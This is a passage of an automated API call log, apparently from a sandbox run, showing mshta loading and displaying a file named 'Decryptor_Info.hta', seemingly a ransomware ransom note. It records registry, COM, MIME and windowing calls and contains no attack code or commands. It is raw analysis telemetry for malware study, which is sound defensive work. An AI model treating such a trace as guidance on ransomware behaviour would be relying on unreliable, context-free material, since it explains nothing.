[0109.702] IUnknown:QueryInterface (in: This=0x47c264, riid=0x73d8d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x22ee9c | out: ppvObject=0x22ee9c*=0x47c264) returned 0x0 [0109.703] IUnknown:Release (This=0x47c264) returned 0x11 [0109.703] IUnknown:AddRef (This=0x47c264) returned 0x12 [0109.704] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x10) returned 0x492f10 [0109.704] IInternetSession:CreateBinding (in: This=0x488270, pbc=0x0, szUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/AppData/Roaming/Decryptor_Info.hta", pUnkOuter=0x0, ppunk=0x0, ppOInetProt=0x492f18, dwOption=0x0 | out: ppunk=0x0, ppOInetProt=0x492f18*=0x493b50) returned 0x0 [0109.705] IUnknown:QueryInterface (in: This=0x493b50, riid=0x73d26078*(Data1=0x53c84785, Data2=0x8425, Data3=0x4dc5, Data4=([0]=0x97, [1]=0x1b, [2]=0xe5, [3]=0x8d, [4]=0x9c, [5]=0x19, [6]=0xf9, [7]=0xb6)), ppvObject=0x22ee20 | out: ppvObject=0x22ee20*=0x0) returned 0x80004002 [0109.705] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x22edbc | out: phkResult=0x22edbc*=0x1dc) returned 0x0 [0109.706] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x22edc0 | out: phkResult=0x22edc0*=0x1e4) returned 0x0 [0109.706] RegOpenKeyExW (in: hKey=0x1e4, lpSubKey="FEATURE_XSSFILTER", ulOptions=0x0, samDesired=0x1, phkResult=0x22ed7c | out: phkResult=0x22ed7c*=0x0) returned 0x2 [0109.706] RegOpenKeyExW (in: hKey=0x1dc, lpSubKey="FEATURE_XSSFILTER", ulOptions=0x0, samDesired=0x1, phkResult=0x22ed7c | out: phkResult=0x22ed7c*=0x1e8) returned 0x0 [0109.706] SHRegGetValueW () returned 0x2 [0109.706] SHRegGetValueW () returned 0x2 [0109.706] RegCloseKey (hKey=0x1e8) returned 0x0 [0109.706] RegCloseKey (hKey=0x0) returned 0x6 [0109.706] RegCloseKey (hKey=0x0) returned 0x6 [0109.706] RegCloseKey (hKey=0x1dc) returned 0x0 [0109.706] RegCloseKey (hKey=0x1e4) returned 0x0 [0109.706] IUnknown:AddRef (This=0x493b50) returned 0x2 [0109.706] IUnknown:QueryInterface (in: This=0x493b50, riid=0x73d26158*(Data1=0xc7a98e66, Data2=0x1010, Data3=0x492c, Data4=([0]=0xa1, [1]=0xc8, [2]=0xc8, [3]=0x9, [4]=0xe1, [5]=0xf7, [6]=0x59, [7]=0x5)), ppvObject=0x22ee64 | out: ppvObject=0x22ee64*=0x493b50) returned 0x0 [0109.706] IInternetProtocolEx:StartEx (This=0x493b50, pUri=0x47c264, pOIProtSink=0x49349c, pOIBindInfo=0x493464, grfPI=0x10, dwReserved=0x0) returned 0x0 [0109.706] IUnknown:AddRef (This=0x49349c) returned 0x3 [0109.707] IUnknown:AddRef (This=0x493464) returned 0x4 [0109.707] IUnknown:QueryInterface (in: This=0x493464, riid=0x76826f40*(Data1=0xa3e015b7, Data2=0xa82c, Data3=0x4dcd, Data4=([0]=0xa1, [1]=0x50, [2]=0x56, [3]=0x9a, [4]=0xee, [5]=0xed, [6]=0x36, [7]=0xab)), ppvObject=0x22ee0c | out: ppvObject=0x22ee0c*=0x0) returned 0x80004002 [0109.707] IInternetBindInfo:GetBindInfo (in: This=0x493464, grfBINDF=0x493cc0, pbindinfo=0x493cc8 | out: grfBINDF=0x493cc0*=0x20083, pbindinfo=0x493cc8) returned 0x0 [0109.707] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x22ed68 | out: phkResult=0x22ed68*=0x1e4) returned 0x0 [0109.707] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x22ed6c | out: phkResult=0x22ed6c*=0x1dc) returned 0x0 [0109.707] RegOpenKeyExW (in: hKey=0x1dc, lpSubKey="FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615", ulOptions=0x0, samDesired=0x1, phkResult=0x22ed28 | out: phkResult=0x22ed28*=0x0) returned 0x2 [0109.707] RegOpenKeyExW (in: hKey=0x1e4, lpSubKey="FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615", ulOptions=0x0, samDesired=0x1, phkResult=0x22ed28 | out: phkResult=0x22ed28*=0x0) returned 0x2 [0109.707] RegCloseKey (hKey=0x0) returned 0x6 [0109.707] RegCloseKey (hKey=0x0) returned 0x6 [0109.707] RegCloseKey (hKey=0x1e4) returned 0x0 [0109.707] RegCloseKey (hKey=0x1dc) returned 0x0 [0109.707] IUnknown:AddRef (This=0x49349c) returned 0x5 [0109.709] IInternetProtocolSink:ReportProgress (This=0x49349c, ulStatusCode=0xb, szStatusText="") returned 0x0 [0109.709] IInternetProtocolSink:ReportProgress (This=0x49349c, ulStatusCode=0xe, szStatusText="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Decryptor_Info.hta") returned 0x0 [0109.709] GetCurrentProcessId () returned 0xe98 [0109.710] IInternetProtocolSink:ReportProgress (This=0x49349c, ulStatusCode=0xd, szStatusText="application/hta") returned 0x0 [0109.710] RegisterClipboardFormatA (lpszFormat="text/html") returned 0xc168 [0109.710] RegisterClipboardFormatA (lpszFormat="text/plain") returned 0xc16a [0109.710] RegisterClipboardFormatA (lpszFormat="text/x-component") returned 0xc189 [0109.710] RegisterClipboardFormatA (lpszFormat="image/gif") returned 0xc167 [0109.710] RegisterClipboardFormatA (lpszFormat="image/jpeg") returned 0xc16c [0109.710] RegisterClipboardFormatA (lpszFormat="image/pjpeg") returned 0xc16b [0109.710] RegisterClipboardFormatA (lpszFormat="image/bmp") returned 0xc170 [0109.710] RegisterClipboardFormatA (lpszFormat="image/x-jg") returned 0xc171 [0109.711] RegisterClipboardFormatA (lpszFormat="image/x-art") returned 0xc172 [0109.711] RegisterClipboardFormatA (lpszFormat="image/x-wmf") returned 0xc174 [0109.711] RegisterClipboardFormatA (lpszFormat="image/x-emf") returned 0xc173 [0109.711] RegisterClipboardFormatA (lpszFormat="video/avi") returned 0xc176 [0109.711] RegisterClipboardFormatA (lpszFormat="video/x-msvideo") returned 0xc177 [0109.711] RegisterClipboardFormatA (lpszFormat="video/mpeg") returned 0xc178 [0109.711] RegisterClipboardFormatA (lpszFormat="video/quicktime") returned 0xc18a [0109.711] RegisterClipboardFormatA (lpszFormat="application/hta") returned 0xc18b [0109.711] RegisterClipboardFormatA (lpszFormat="image/x-png") returned 0xc16e [0109.711] RegisterClipboardFormatA (lpszFormat="image/png") returned 0xc16f [0109.711] RegisterClipboardFormatA (lpszFormat="image/x-icon") returned 0xc175 [0109.711] StrCmpICW (pszStr1="application/hta", pszStr2="text/xml") returned -19 [0109.711] StrCmpNICW (lpStr1="applicat", lpStr2="text/css", nChar=8) returned -19 [0109.711] IInternetProtocolSink:ReportData (This=0x49349c, grfBSCF=0x5, ulProgress=0xd08, ulProgressMax=0xd08) returned 0x0 [0109.711] IUnknown:QueryInterface (in: This=0x493b50, riid=0x73d49460*(Data1=0x79eac9d8, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x22d334 | out: ppvObject=0x22d334*=0x0) returned 0x80004002 [0109.711] IUnknown:QueryInterface (in: This=0x493b50, riid=0x73cc4588*(Data1=0x79eac9d6, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x22d32c | out: ppvObject=0x22d32c*=0x0) returned 0x80004002 [0109.712] IInternetProtocolSink:ReportResult (This=0x49349c, hrResult=0x0, dwError=0x0, szResult=0x0) returned 0x0 [0109.712] IUnknown:Release (This=0x493b50) returned 0x2 [0109.712] IUnknown:Release (This=0x47c264) returned 0x13 [0109.712] IUnknown:Release (This=0x47c264) returned 0x12 [0109.712] IUnknown:Release (This=0x47c264) returned 0x11 [0109.712] CoTaskMemFree (pv=0x0) [0109.712] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x1a8) returned 0x494670 [0109.712] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x22f150 | out: lpCPInfo=0x22f150) returned 1 [0109.712] IUnknown:AddRef (This=0x488270) returned 0x3 [0109.713] IUnknown:AddRef (This=0x47c264) returned 0x12 [0109.713] IUnknown:QueryInterface (in: This=0x47c264, riid=0x73d8d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x22f158 | out: ppvObject=0x22f158*=0x47c264) returned 0x0 [0109.713] IUnknown:Release (This=0x47c264) returned 0x12 [0109.713] IUnknown:AddRef (This=0x47c264) returned 0x13 [0109.713] IUri:GetScheme (in: This=0x47c264, pdwScheme=0x22f15c | out: pdwScheme=0x22f15c*=0x9) returned 0x0 [0109.713] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x58) returned 0x4937d0 [0109.713] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1dc [0109.713] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x73cfe718, lpParameter=0x4937d0, dwCreationFlags=0x0, lpThreadId=0x4937e4 | out: lpThreadId=0x4937e4*=0xea4) returned 0xa8 [0109.714] GetCurrentThreadId () returned 0xe9c [0109.714] GetCurrentThreadId () returned 0xe9c [0109.714] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x96) returned 0x494820 [0109.714] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0109.714] MulDiv (nNumber=3336, nNumerator=4000, nDenominator=3336) returned 4000 [0109.714] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x9a) returned 0x4948c0 [0109.715] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x128) returned 0x494968 [0109.715] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x4647d8 [0109.715] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x86) returned 0x494a98 [0109.715] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x100) returned 0x494b28 [0109.715] IInternetProtocol:Read (in: This=0x493b50, pv=0x494b34, cb=0xc8, pcbRead=0x22f0a0 | out: pv=0x494b34, pcbRead=0x22f0a0*=0xc8) returned 0x0 [0109.715] CoInternetIsFeatureEnabledForUrl (FeatureEntry=0x3, dwFlags=0x2, szURL="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/AppData/Roaming/Decryptor_Info.hta", pSecMgr=0x0) returned 0x1 [0109.716] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x22f028 | out: phkResult=0x22f028*=0xb0) returned 0x0 [0109.716] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x22f02c | out: phkResult=0x22f02c*=0x1f0) returned 0x0 [0109.716] RegOpenKeyExW (in: hKey=0x1f0, lpSubKey="FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE", ulOptions=0x0, samDesired=0x1, phkResult=0x22efe8 | out: phkResult=0x22efe8*=0x0) returned 0x2 [0109.716] RegOpenKeyExW (in: hKey=0xb0, lpSubKey="FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE", ulOptions=0x0, samDesired=0x1, phkResult=0x22efe8 | out: phkResult=0x22efe8*=0x0) returned 0x2 [0109.716] RegCloseKey (hKey=0x0) returned 0x6 [0109.716] RegCloseKey (hKey=0x0) returned 0x6 [0109.716] RegCloseKey (hKey=0xb0) returned 0x0 [0109.716] RegCloseKey (hKey=0x1f0) returned 0x0 [0109.717] FindMimeFromData (in: pBC=0x0, pwzUrl="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Decryptor_Info.hta", pBuffer=0x22f0c8, cbSize=0xc8, pwzMimeProposed="text/html", dwMimeFlags=0x6, ppwzMimeOut=0x22f080, dwReserved=0x0 | out: ppwzMimeOut=0x22f080*="text/html") returned 0x0 [0109.719] CoTaskMemFree (pv=0x495268) [0109.719] CoInternetIsFeatureEnabledForUrl (FeatureEntry=0x3, dwFlags=0x2, szURL="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/AppData/Roaming/Decryptor_Info.hta", pSecMgr=0x0) returned 0x1 [0109.719] StrCmpNIW (lpStr1="text/h", lpStr2="image/", nChar=6) returned 1 [0109.720] GetCurrentThreadId () returned 0xe9c [0109.720] SetEvent (hEvent=0x1dc) returned 1 [0109.724] GetCurrentThreadId () returned 0xe9c [0109.727] IUnknown:Release (This=0x47c264) returned 0x14 [0109.727] IUnknown:Release (This=0x47c774) returned 0x1 [0109.727] IUnknown:Release (This=0x474038) returned 0x3 [0109.727] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0109.727] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0109.727] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0109.727] IUnknown:Release (This=0x47c264) returned 0x13 [0109.727] IUnknown:Release (This=0x47c264) returned 0x12 [0109.729] IUnknown:Release (This=0x47c264) returned 0x11 [0109.729] IUnknown:Release (This=0x474038) returned 0x2 [0109.729] IUnknown:Release (This=0x47c264) returned 0x10 [0109.729] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0109.729] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0109.729] CoTaskMemFree (pv=0x48fa70) [0109.729] CoTaskMemFree (pv=0x0) [0109.729] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0109.729] IUnknown:Release (This=0x47c264) returned 0xf [0109.729] CoTaskMemFree (pv=0x48f9d0) [0109.729] GetClientRect (in: hWnd=0x301f0, lpRect=0x22f674 | out: lpRect=0x22f674) returned 1 [0109.729] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x78) returned 0x461c20 [0109.729] GetClientRect (in: hWnd=0x301f0, lpRect=0x461c4c | out: lpRect=0x461c4c) returned 1 [0109.730] OffsetRect (in: lprc=0x461c4c, dx=0, dy=0 | out: lprc=0x461c4c) returned 1 [0109.730] OffsetRect (in: lprc=0x461c5c, dx=0, dy=0 | out: lprc=0x461c5c) returned 1 [0109.730] RegisterClassExW (param_1=0x22f190) returned 0xc18c [0109.730] CoCreateInstance (in: rclsid=0x73d1bf70*(Data1=0x50d5107a, Data2=0xd278, Data3=0x4871, Data4=([0]=0x89, [1]=0x89, [2]=0xf4, [3]=0xce, [4]=0xaa, [5]=0xf5, [6]=0x9c, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x401, riid=0x73d1bf60*(Data1=0x8c0e040, Data2=0x62d1, Data3=0x11d1, Data4=([0]=0x93, [1]=0x26, [2]=0x0, [3]=0x60, [4]=0xb0, [5]=0x67, [6]=0xb8, [7]=0x6e)), ppv=0x7410b020 | out: ppv=0x7410b020*=0x4919c8) returned 0x0 [0109.920] CActiveIMMAppEx_Trident:IActiveIMMApp:FilterClientWindows (This=0x4919c8, aaClassList=0x22f288*=0xc18c, uSize=0x1) returned 0x0 [0109.920] CreateWindowExW (dwExStyle=0x0, lpClassName=0xc18c, lpWindowName=0x0, dwStyle=0x46000000, X=0, Y=0, nWidth=1064, nHeight=587, hWndParent=0x301f0, hMenu=0x0, hInstance=0x73bd0000, lpParam=0x4822d0) returned 0x201f2 [0109.921] GetWindowLongW (hWnd=0x201f2, nIndex=-20) returned 0 [0109.921] SetWindowLongW (hWnd=0x201f2, nIndex=-21, dwNewLong=4727504) returned 0 [0109.921] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x4919c8, hWnd=0x201f2, msg=0x81, wParam=0x0, lParam=0x22ee5c*=4727504, plResult=0x22ecd4 | out: plResult=0x22ecd4) returned 0x1 [0109.921] NtdllDefWindowProc_W () returned 0x1 [0109.921] GetCurrentThreadId () returned 0xe9c [0109.921] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0109.921] GetCurrentThreadId () returned 0xe9c [0109.921] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0109.921] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x4919c8, hWnd=0x201f2, msg=0x1, wParam=0x0, lParam=0x22ee5c*=4727504, plResult=0x22ecd4 | out: plResult=0x22ecd4) returned 0x1 [0109.921] NtdllDefWindowProc_W () returned 0x0 [0109.921] GetCurrentThreadId () returned 0xe9c [0109.921] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0109.921] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x4919c8, hWnd=0x201f2, msg=0x5, wParam=0x0, lParam=0x24b0428, plResult=0x22ed20 | out: plResult=0x22ed20) returned 0x1 [0109.921] NtdllDefWindowProc_W () returned 0x0 [0109.921] GetCurrentThreadId () returned 0xe9c [0109.922] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0109.922] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x4919c8, hWnd=0x201f2, msg=0x3, wParam=0x0, lParam=0x0, plResult=0x22ed20 | out: plResult=0x22ed20) returned 0x1 [0109.922] NtdllDefWindowProc_W () returned 0x0 [0109.922] GetCurrentThreadId () returned 0xe9c [0109.922] NtdllDefWindowProc_W () returned 0x0 [0109.922] GetClassNameW (in: hWnd=0x301f0, lpClassName=0x22f290, nMaxCount=256 | out: lpClassName="HTML Application Host Window Class") returned 34 [0109.922] StrCmpIW (psz1="HTML Application Host Window Class", psz2="HTMLPageDesignerWndClass") returned -1 [0109.922] CActiveIMMAppEx_Trident:IActiveIMMApp:Activate (This=0x4919c8, fRestoreLayout=1) returned 0x0 [0109.922] SendMessageW (hWnd=0x201f2, Msg=0x129, wParam=0x0, lParam=0x0) returned 0x3 [0109.922] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0109.922] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x4919c8, hWnd=0x201f2, msg=0x129, wParam=0x0, lParam=0x0, plResult=0x22f144 | out: plResult=0x22f144) returned 0x1 [0109.922] NtdllDefWindowProc_W () returned 0x3 [0109.922] GetCurrentThreadId () returned 0xe9c [0109.922] IntersectRect (in: lprcDst=0x22f4c4, lprcSrc1=0x461c4c, lprcSrc2=0x461c5c | out: lprcDst=0x22f4c4) returned 1 [0109.922] EqualRect (lprc1=0x22f4c4, lprc2=0x461c4c) returned 1 [0109.922] InvalidateRect (hWnd=0x201f2, lpRect=0x0, bErase=1) returned 1 [0109.922] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xf0) returned 0x48f9d0 [0109.923] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x150) returned 0x4a1b60 [0109.923] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x140) returned 0x4a1cb8 [0109.923] IntersectRect (in: lprcDst=0x22f3b0, lprcSrc1=0x22f3b0, lprcSrc2=0x22f348 | out: lprcDst=0x22f3b0) returned 1 [0109.923] IntersectRect (in: lprcDst=0x22f3b0, lprcSrc1=0x22f3b0, lprcSrc2=0x22f348 | out: lprcDst=0x22f3b0) returned 1 [0109.923] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x60) returned 0x4a1e00 [0109.923] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x30) returned 0x46d968 [0109.923] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xec) returned 0x4a2290 [0109.923] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0109.923] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0109.923] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x30) returned 0x46d9a0 [0109.923] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x493078 [0109.945] GetCurrentThreadId () returned 0xe9c [0109.945] GetCurrentThreadId () returned 0xe9c [0109.945] GetCurrentThreadId () returned 0xe9c [0109.945] IntersectRect (in: lprcDst=0x22f1ec, lprcSrc1=0x22f1ec, lprcSrc2=0x22f1bc | out: lprcDst=0x22f1ec) returned 1 [0109.945] IntersectRect (in: lprcDst=0x4a1d18, lprcSrc1=0x4a1d18, lprcSrc2=0x22f1dc | out: lprcDst=0x4a1d18) returned 1 [0109.945] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0109.945] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x28) returned 0x4920e0 [0109.945] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4920e0 | out: hHeap=0x450000) returned 1 [0109.945] SetWindowPos (hWnd=0x201f2, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x5f) returned 1 [0109.945] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0109.945] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x4919c8, hWnd=0x201f2, msg=0x46, wParam=0x0, lParam=0x22f4a4*=131570, plResult=0x22f340 | out: plResult=0x22f340) returned 0x1 [0109.945] NtdllDefWindowProc_W () returned 0x0 [0109.945] GetCurrentThreadId () returned 0xe9c [0109.946] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0109.946] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x4919c8, hWnd=0x201f2, msg=0x47, wParam=0x0, lParam=0x22f4a4*=131570, plResult=0x22f33c | out: plResult=0x22f33c) returned 0x1 [0109.946] NtdllDefWindowProc_W () returned 0x0 [0109.946] GetCurrentThreadId () returned 0xe9c [0109.946] SetTimer (hWnd=0x201f2, nIDEvent=0x1000, uElapse=0x64, lpTimerFunc=0x0) returned 0x1000 [0109.946] GetFocus () returned 0x0 [0109.946] EnumChildWindows (hWndParent=0x201f2, lpEnumFunc=0x73ef0a73, lParam=0x22f39c) returned 0 [0109.962] GetFocus () returned 0x0 [0109.962] SetFocus (hWnd=0x201f2) returned 0x0 [0109.965] NtdllDefWindowProc_W () returned 0x0 [0109.965] NtdllDefWindowProc_W () returned 0x0 [0109.966] NtdllDefWindowProc_W () returned 0x0 [0109.966] NtdllDefWindowProc_W () returned 0x0 [0109.966] NtdllDefWindowProc_W () returned 0x0 [0109.967] NtdllDefWindowProc_W () returned 0x0 [0109.967] NtdllDefWindowProc_W () returned 0x0 [0109.968] NtdllDefWindowProc_W () returned 0x0 [0109.968] NtdllDefWindowProc_W () returned 0x0 [0109.968] NtdllDefWindowProc_W () returned 0x0 [0109.968] NtdllDefWindowProc_W () returned 0x1 [0109.968] NtdllDefWindowProc_W () returned 0x0 [0109.971] NtdllDefWindowProc_W () returned 0x0 [0110.011] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0110.011] LoadLibraryA (lpLibFileName="OLEACC.DLL") returned 0x75370000 [0110.016] GetProcAddress (hModule=0x75370000, lpProcName="LresultFromObject") returned 0x75372663 [0110.016] LresultFromObject () returned 0xc165 [0110.361] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x14) returned 0x4959a8 [0110.362] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x28) returned 0x492230 [0110.857] GetCurrentThreadId () returned 0xe9c [0110.861] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4959a8 | out: hHeap=0x450000) returned 1 [0110.863] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x60) returned 0x4a98a0 [0110.863] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x14) returned 0x4959a8 [0110.863] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x40) returned 0x4ab2a0 [0110.864] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4a98a0 | out: hHeap=0x450000) returned 1 [0110.866] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x60) returned 0x4a98a0 [0110.866] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x14) returned 0x4959c8 [0110.866] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x40) returned 0x4ab2e8 [0110.866] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4a98a0 | out: hHeap=0x450000) returned 1 [0110.866] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x28) returned 0x4922c0 [0110.866] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x48) returned 0x4ac450 [0110.867] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0110.868] GetMessageTime () returned 0 [0110.868] GetMessagePos () returned 0x0 [0110.868] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x4919c8, hWnd=0x201f2, msg=0x281, wParam=0x1, lParam=0xc000000f, plResult=0x22ed64 | out: plResult=0x22ed64) returned 0x0 [0110.871] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0110.871] GetMessageTime () returned 0 [0110.871] GetMessagePos () returned 0x0 [0110.871] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x4919c8, hWnd=0x201f2, msg=0x282, wParam=0x2, lParam=0x0, plResult=0x22e794 | out: plResult=0x22e794) returned 0x0 [0110.871] GetCurrentThreadId () returned 0xe9c [0110.871] GetCurrentThreadId () returned 0xe9c [0110.871] GetWindowLongW (hWnd=0x201f2, nIndex=-21) returned 4727504 [0110.872] GetMessageTime () returned 0 [0110.872] GetMessagePos () returned 0x0 [0110.872] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22ef18 | out: lpPoint=0x22ef18) returned 1 [0110.872] ScreenToClient (in: hWnd=0x201f2, lpPoint=0x22ef18 | out: lpPoint=0x22ef18) returned 1 [0110.872] GetCapture () returned 0x0 [0110.874] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x30) returned 0x4aa958 [0110.874] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x28) returned 0x4922f0 [0110.875] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x4a96b8 [0110.875] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4a96b8 | out: hHeap=0x450000) returned 1 [0110.875] GetCurrentThreadId () returned 0xe9c [0110.875] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4aa958 | out: hHeap=0x450000) returned 1 [0110.875] GetCurrentThreadId () returned 0xe9c [0110.875] GetCurrentThreadId () returned 0xe9c [0110.875] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x46d888, Size=0x48) returned 0x4ac4a0 [0110.875] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x4919c8, hWnd=0x201f2, msg=0x7, wParam=0x0, lParam=0x0, plResult=0x22f154 | out: plResult=0x22f154) returned 0x1 [0110.876] NtdllDefWindowProc_W () returned 0x0 [0110.876] GetCurrentThreadId () returned 0xe9c [0110.876] CActiveIMMAppEx_Trident:IActiveIMMApp:getContext (in: This=0x4919c8, hWnd=0x201f2, phIMC=0x22f47c | out: phIMC=0x22f47c*=0x2800f9) returned 0x0 [0110.876] CActiveIMMAppEx_Trident:IActiveIMMApp:AssociateContext (in: This=0x4919c8, hWnd=0x201f2, hIME=0x0, phPrev=0x22f47c | out: phPrev=0x22f47c*=0x2800f9) returned 0x0 [0110.876] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x60) returned 0x4a98a0 [0110.877] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4a98a0 | out: hHeap=0x450000) returned 1 [0110.877] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x60) returned 0x4a98a0 [0110.877] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4a98a0 | out: hHeap=0x450000) returned 1 [0110.878] HeapFree (in: hHeap=0x450000, 